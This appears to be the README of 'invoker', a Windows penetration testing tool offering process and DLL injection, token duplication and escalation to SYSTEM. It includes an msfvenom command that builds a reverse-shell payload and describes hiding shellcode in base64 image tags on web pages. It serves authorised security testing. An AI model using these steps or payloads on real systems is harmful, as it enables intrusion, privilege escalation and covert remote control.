invoker: Penetration testing utility
Penetration testing utility.
The goal is to use this tool when access to some Windows OS features through GUI is restricted.
- invoke the Command Prompt and PowerShell,
- download a file,
- schedule a task,
- add a registry key,
- connect to a remote host,
- terminate a running process,
- run a new process,
- inject bytecode into a running process,
- inject DLL into a running process,
- enable access token privileges,
- the duplicate access token.
Elevate privileges by injecting bytecode into a higher-privileged process.
This tool will parse any HTTP response received and look for the custom image element <img class=”bc” src=”data:image/gif;base64,encoded” alt=”bc” hidden=”hidden”> where encoded is a binary code/file encoded in Base64.
With this, you can hide your bytecode inside any legitimate web page in plain sight but you must strictly follow this format/rule.
You can also make your own custom element but don’t forget to modify the existing HTTP response parsing inside the program source code and recompile it.
Check an example at pastebin.com/raw/Nd1tCBv6.
Bytecode provided will most certainly not work for you.
Bytecode was generated on Kali Linux v2019.4 (64 bit) with the following MSFvenom command (modify it to your need):
msfvenom –platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.185 LPORT=9000 EXITFUNC=thread -f raw -b \x00\x0a\x0d\xff | base64 -w 0 > /root/Desktop/payload.txt
Bytecode might not work on the first try due to some other bad characters.
Check all the PowerShell scripts used in the main C++ program here.
Get the LocalSystem Account (NT AUTHORITY\SYSTEM)
Run the Invoker.exe as administrator.
Enable all access token privileges.
Duplicate the access token from e.g. Windows Logon Application (winlogon.exe) and run a new instance of Invoker.exe.
Within the new Invoker.exe instance, open the Command Prompt and run
whoami, you should now see
Enable all access token privileges once again.
Close the previous instance of Invoker.exe.
P.S. You get more access token privileges from Local Security Authority Subsystem Service (lsass.exe).
git clone https://github.com/ivan-sincek/invoker.git
Copyright (c) 2019 Ivan Šincek